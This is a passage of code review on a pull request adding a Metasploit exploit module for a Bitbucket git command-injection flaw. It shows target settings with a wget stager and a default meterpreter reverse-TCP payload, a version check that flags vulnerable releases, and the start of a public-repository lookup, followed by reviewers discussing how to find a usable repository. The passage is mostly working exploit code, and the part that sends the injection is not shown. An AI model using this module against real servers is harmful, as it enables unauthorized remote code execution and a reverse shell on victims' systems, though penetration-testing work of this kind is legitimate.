modules/exploits/linux/http/bitbucket_git_cmd_injection.rb

```diff
@@ -0,0 +1,161 @@
+            {
+              'Platform' => 'linux',
+              'Arch' => [ ARCH_X86, ARCH_X64 ],
+              'CmdStagerFlavor' => 'wget',
+              'DefaultOptions' => { 'Payload' => 'linux/x64/meterpreter/reverse_tcp' }
+            }
+          ]
+        ],
+        'DisclosureDate' => '2022-08-24',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(7990),
+        OptString.new('TARGETURI', [ true, 'The base URI of Bitbucket application', '/'])
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'login')
+    )
+
+    return CheckCode::Unknown('Failed to receive response from application') unless res
+
+    unless res.body.include?('Bitbucket')
+      return CheckCode::Safe('Target does not appear to be Bitbucket')
+    end
+
+    footer = res.get_html_document&.at('footer')
+    return CheckCode::Detected('Cannot determine version of Bitbucket') unless footer
+
+    version_str = footer.at('span')&.children&.text
+    return CheckCode::Detected('Cannot find version string in footer') unless version_str
+
+    matches = version_str.match(/v(\d+\.\d+\.\d+)/)
+    return CheckCode::Detected('Version unknown') unless matches && matches.length > 1
+
+    version_str = matches[1]
+    vprint_status("Found Bitbucket version: #{matches[1]}")
+
+    num_vers = Rex::Version.new(version_str)
+    return CheckCode::NotVulnerable if num_vers <= Rex::Version.new('6.10.17')
+
+    major, minor, revision = version_str.split('.')
+    case major
+    when '6'
+      return CheckCode::Appears
+    when '7'
+      case minor
+      when '6'
+        return CheckCode::Appears if revision.to_i < 17
+      when '17'
+        return CheckCode::Appears if revision.to_i < 10
+      when '21'
+        return CheckCode::Appears if revision.to_i < 4
+      end
+    when '8'
+      case minor
+      when '0', '1'
+        return CheckCode::Appears if revision.to_i < 3
+      when '2'
+        return CheckCode::Appears if revision.to_i < 2
+      when '3'
+        return CheckCode::Appears if revision.to_i < 1
+      end
+    end
+
+    CheckCode::Detected
+  end
+
+  def find_public_repo
+    print_status('Searching Bitbucket for publicly accessible repository')
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'rest/api/latest/repos')
+    )
+
+    fail_with(Failure::Disconnected, 'Did not receive a response') unless res
+    json_data = JSON.parse(res.body)
+    fail_with(Failure::UnexpectedReply, 'Response had no JSON') unless json_data
+
+    unless json_data['size'] > 0
+      fail_with(Failure::NotFound, 'Bitbucket instance has no publicly available repositories')
+    end
+
+    json_data = json_data['values']&.first
```

Comment:
Is it possible that there are multiple projects, and the first doesn't have a public repo? Perhaps looping through all the projects would work better? (I'm not sure if that's actually possible)

Reply:
Yea, that's most likely possible. Each project and repo has a key stating whether it's public or not, so checking that would be wise.

Reply:
Added in [34a6671](https://github.com/rapid7/metasploit-framework/pull/17042/commits/34a6671c2d4e9e20457281aea59c65bffb05eecf). Prioritizes public repos first, but attempts private repos if authenticated.